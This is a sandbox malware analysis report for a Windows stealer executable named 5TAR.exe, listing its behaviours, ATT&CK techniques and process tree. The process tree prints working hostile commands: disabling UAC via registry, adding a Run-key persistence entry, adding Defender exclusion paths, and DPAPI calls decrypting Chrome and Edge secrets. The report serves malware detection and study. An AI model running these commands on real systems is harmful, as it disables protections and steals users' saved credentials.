955f34b03a750dafa467506717bb97f0aedb1f40afcb8494819d3c50a9889e55

Analysis

max time kernel
1714s
max time network
1151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
01-11-2024 16:40

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5TAR.exe
Size

37.2MB
MD5

319b40c6183936077f43a1bece77b636
SHA1

ea16f1e1ef7723d860b35728e055653c8bd6b3ae
SHA256

955f34b03a750dafa467506717bb97f0aedb1f40afcb8494819d3c50a9889e55
SHA512

a6263edc173f6605a4a665215eb3304bfc451adb9c50a676d5dc7e9949a81f24d3ecac1890cf612a95eda406ecc4c95dadcc4b167956c54042acd6ab078d24ad
SSDEEP

393216:RQgHDlanaGBXvDKtz+bhPWES4tiNQPNrIKc4gaPbUAgrO4mgn96l+ZArYsFRlnPw:R3on1HvSzxAMNnFZArYsPPvX7OZKmd

Score

10^/10

discovery evasion execution persistence spyware stealer trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

2536 powershell.exe
3592 powershell.exe
3944 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

5TAR.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation 5TAR.exe
Executes dropped EXE 2 IoCs

Processes:

python-installer.exepython-installer.exe

pid process

4272 python-installer.exe
1560 python-installer.exe
Loads dropped DLL 2 IoCs

Processes:

5TAR.exepython-installer.exe

pid process

4768 5TAR.exe
1560 python-installer.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	5TAR.exe

pid	process
4272	python-installer.exe
1560	python-installer.exe

pid	process
4768	5TAR.exe
1560	python-installer.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

python-installer.exereg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5TAR = "C:\\ProgramData\\Update.vbs"	reg.exe

Blocklisted process makes network request 1 IoCs

Processes:

msiexec.exe

flow pid process

34 3988 msiexec.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

flow	pid	process
34	3988	msiexec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exe

description	ioc	process
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

22 discord.com
14 discord.com
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

Processes:

cmd.execmd.exe

pid process

4192 cmd.exe
1676 cmd.exe
Drops file in System32 directory 2 IoCs

Processes:

5TAR.exe

description ioc process

File created C:\Windows\System32\3bVuqPfiGL.txt 5TAR.exe
File opened for modification C:\Windows\System32\3bVuqPfiGL.txt 5TAR.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs
discovery

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2500 tasklist.exe
2880 tasklist.exe

flow	ioc
22	discord.com
14	discord.com

pid	process
4192	cmd.exe
1676	cmd.exe

description	ioc	process
File created	C:\Windows\System32\3bVuqPfiGL.txt	5TAR.exe
File opened for modification	C:\Windows\System32\3bVuqPfiGL.txt	5TAR.exe

pid	process
2500	tasklist.exe
2880	tasklist.exe

Drops file in Windows directory 8 IoCs

Processes:

msiexec.exe

description	ioc	process
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE59D.tmp	msiexec.exe
File created	C:\Windows\Installer\e57e2b3.msi	msiexec.exe
File created	C:\Windows\Installer\e57e2af.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\e57e2af.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

python-installer.exepython-installer.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	python-installer.exe

Modifies registry class 12 IoCs

Processes:

python-installer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0"	python-installer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)"	python-installer.exe
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer	python-installer.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsiexec.exe

pid	process
2536	powershell.exe
2536	powershell.exe
1680	powershell.exe
1680	powershell.exe
3304	powershell.exe
3304	powershell.exe
3592	powershell.exe
3592	powershell.exe
3592	powershell.exe
3944	powershell.exe
3944	powershell.exe
3988	msiexec.exe
3988	msiexec.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeWMIC.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2536	powershell.exe
Token: SeIncreaseQuotaPrivilege	3468	WMIC.exe
Token: SeSecurityPrivilege	3468	WMIC.exe
Token: SeTakeOwnershipPrivilege	3468	WMIC.exe
Token: SeLoadDriverPrivilege	3468	WMIC.exe
Token: SeSystemProfilePrivilege	3468	WMIC.exe
Token: SeSystemtimePrivilege	3468	WMIC.exe
Token: SeProfSingleProcessPrivilege	3468	WMIC.exe
Token: SeIncBasePriorityPrivilege	3468	WMIC.exe
Token: SeCreatePagefilePrivilege	3468	WMIC.exe
Token: SeBackupPrivilege	3468	WMIC.exe
Token: SeRestorePrivilege	3468	WMIC.exe
Token: SeShutdownPrivilege	3468	WMIC.exe
Token: SeDebugPrivilege	3468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3468	WMIC.exe
Token: SeRemoteShutdownPrivilege	3468	WMIC.exe
Token: SeUndockPrivilege	3468	WMIC.exe
Token: SeManageVolumePrivilege	3468	WMIC.exe
Token: 33	3468	WMIC.exe
Token: 34	3468	WMIC.exe
Token: 35	3468	WMIC.exe
Token: 36	3468	WMIC.exe
Token: SeDebugPrivilege	2500	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3468	WMIC.exe
Token: SeSecurityPrivilege	3468	WMIC.exe
Token: SeTakeOwnershipPrivilege	3468	WMIC.exe
Token: SeLoadDriverPrivilege	3468	WMIC.exe
Token: SeSystemProfilePrivilege	3468	WMIC.exe
Token: SeSystemtimePrivilege	3468	WMIC.exe
Token: SeProfSingleProcessPrivilege	3468	WMIC.exe
Token: SeIncBasePriorityPrivilege	3468	WMIC.exe
Token: SeCreatePagefilePrivilege	3468	WMIC.exe
Token: SeBackupPrivilege	3468	WMIC.exe
Token: SeRestorePrivilege	3468	WMIC.exe
Token: SeShutdownPrivilege	3468	WMIC.exe
Token: SeDebugPrivilege	3468	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3468	WMIC.exe
Token: SeRemoteShutdownPrivilege	3468	WMIC.exe
Token: SeUndockPrivilege	3468	WMIC.exe
Token: SeManageVolumePrivilege	3468	WMIC.exe
Token: 33	3468	WMIC.exe
Token: 34	3468	WMIC.exe
Token: 35	3468	WMIC.exe
Token: 36	3468	WMIC.exe
Token: SeDebugPrivilege	2880	tasklist.exe
Token: SeDebugPrivilege	1680	powershell.exe
Token: SeDebugPrivilege	3304	powershell.exe
Token: SeIncreaseQuotaPrivilege	3488	WMIC.exe
Token: SeSecurityPrivilege	3488	WMIC.exe
Token: SeTakeOwnershipPrivilege	3488	WMIC.exe
Token: SeLoadDriverPrivilege	3488	WMIC.exe
Token: SeSystemProfilePrivilege	3488	WMIC.exe
Token: SeSystemtimePrivilege	3488	WMIC.exe
Token: SeProfSingleProcessPrivilege	3488	WMIC.exe
Token: SeIncBasePriorityPrivilege	3488	WMIC.exe
Token: SeCreatePagefilePrivilege	3488	WMIC.exe
Token: SeBackupPrivilege	3488	WMIC.exe
Token: SeRestorePrivilege	3488	WMIC.exe
Token: SeShutdownPrivilege	3488	WMIC.exe
Token: SeDebugPrivilege	3488	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3488	WMIC.exe
Token: SeRemoteShutdownPrivilege	3488	WMIC.exe
Token: SeUndockPrivilege	3488	WMIC.exe
Token: SeManageVolumePrivilege	3488	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5TAR.execmd.exepowershell.execsc.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4768 wrote to memory of 3220	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 3220	4768	5TAR.exe	cmd.exe
PID 3220 wrote to memory of 2536	3220	cmd.exe	powershell.exe
PID 3220 wrote to memory of 2536	3220	cmd.exe	powershell.exe
PID 2536 wrote to memory of 1876	2536	powershell.exe	csc.exe
PID 2536 wrote to memory of 1876	2536	powershell.exe	csc.exe
PID 1876 wrote to memory of 1320	1876	csc.exe	cvtres.exe
PID 1876 wrote to memory of 1320	1876	csc.exe	cvtres.exe
PID 4768 wrote to memory of 3348	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 3348	4768	5TAR.exe	cmd.exe
PID 3348 wrote to memory of 3468	3348	cmd.exe	WMIC.exe
PID 3348 wrote to memory of 3468	3348	cmd.exe	WMIC.exe
PID 4768 wrote to memory of 2924	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 2924	4768	5TAR.exe	cmd.exe
PID 2924 wrote to memory of 2500	2924	cmd.exe	tasklist.exe
PID 2924 wrote to memory of 2500	2924	cmd.exe	tasklist.exe
PID 4768 wrote to memory of 1608	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 1608	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 4192	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 4192	4768	5TAR.exe	cmd.exe
PID 1608 wrote to memory of 2880	1608	cmd.exe	tasklist.exe
PID 1608 wrote to memory of 2880	1608	cmd.exe	tasklist.exe
PID 4192 wrote to memory of 1680	4192	cmd.exe	powershell.exe
PID 4192 wrote to memory of 1680	4192	cmd.exe	powershell.exe
PID 4768 wrote to memory of 1676	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 1676	4768	5TAR.exe	cmd.exe
PID 1676 wrote to memory of 3304	1676	cmd.exe	powershell.exe
PID 1676 wrote to memory of 3304	1676	cmd.exe	powershell.exe
PID 4768 wrote to memory of 4148	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 4148	4768	5TAR.exe	cmd.exe
PID 4148 wrote to memory of 4460	4148	cmd.exe	reg.exe
PID 4148 wrote to memory of 4460	4148	cmd.exe	reg.exe
PID 4768 wrote to memory of 4376	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 4376	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 4388	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 4388	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 4448	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 4448	4768	5TAR.exe	cmd.exe
PID 4448 wrote to memory of 3592	4448	cmd.exe	powershell.exe
PID 4448 wrote to memory of 3592	4448	cmd.exe	powershell.exe
PID 4376 wrote to memory of 3488	4376	cmd.exe	WMIC.exe
PID 4376 wrote to memory of 3488	4376	cmd.exe	WMIC.exe
PID 4388 wrote to memory of 2660	4388	cmd.exe	reg.exe
PID 4388 wrote to memory of 2660	4388	cmd.exe	reg.exe
PID 4768 wrote to memory of 2452	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 2452	4768	5TAR.exe	cmd.exe
PID 2452 wrote to memory of 3944	2452	cmd.exe	powershell.exe
PID 2452 wrote to memory of 3944	2452	cmd.exe	powershell.exe
PID 4768 wrote to memory of 1548	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 1548	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 3988	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 3988	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 3640	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 3640	4768	5TAR.exe	cmd.exe
PID 1548 wrote to memory of 4396	1548	cmd.exe	WMIC.exe
PID 1548 wrote to memory of 4396	1548	cmd.exe	WMIC.exe
PID 3988 wrote to memory of 1772	3988	cmd.exe	WMIC.exe
PID 3988 wrote to memory of 1772	3988	cmd.exe	WMIC.exe
PID 4768 wrote to memory of 856	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 856	4768	5TAR.exe	cmd.exe
PID 856 wrote to memory of 4748	856	cmd.exe	WMIC.exe
PID 856 wrote to memory of 4748	856	cmd.exe	WMIC.exe
PID 4768 wrote to memory of 4524	4768	5TAR.exe	cmd.exe
PID 4768 wrote to memory of 4524	4768	5TAR.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\5TAR.exe
"C:\Users\Admin\AppData\Local\Temp\5TAR.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\KKfb1a3bZl.ps1""
2⤵
- Suspicious use of WriteProcessMemory
PID:3220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\KKfb1a3bZl.ps1"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2536

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ll5aphoi\ll5aphoi.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1876

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBCB8.tmp" "c:\Users\Admin\AppData\Local\Temp\ll5aphoi\CSC5F3511AE212C422B8D83FC9EA7B91.TMP"
5⤵
PID:1320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:3348

C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
- Suspicious use of WriteProcessMemory
PID:2924

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
- Suspicious use of WriteProcessMemory
PID:1608

C:\Windows\system32\tasklist.exe
tasklist
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')"
2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:4192

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')"
2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3304

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:4148

C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
PID:4460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:4376

C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3488

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 5TAR /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:4388

C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 5TAR /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
3⤵
- Adds Run key to start application
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.8ZgfFb0R8B""
2⤵
- Suspicious use of WriteProcessMemory
PID:4448

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.8ZgfFb0R8B"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
2⤵
- Suspicious use of WriteProcessMemory
PID:2452

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3944

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:1548

C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
3⤵
PID:4396

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:3988

C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
3⤵
PID:1772

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
2⤵
PID:3640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
2⤵
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
3⤵
PID:4748

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
2⤵
PID:4524

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
3⤵
PID:4492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
2⤵
PID:212

C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
3⤵
PID:4252
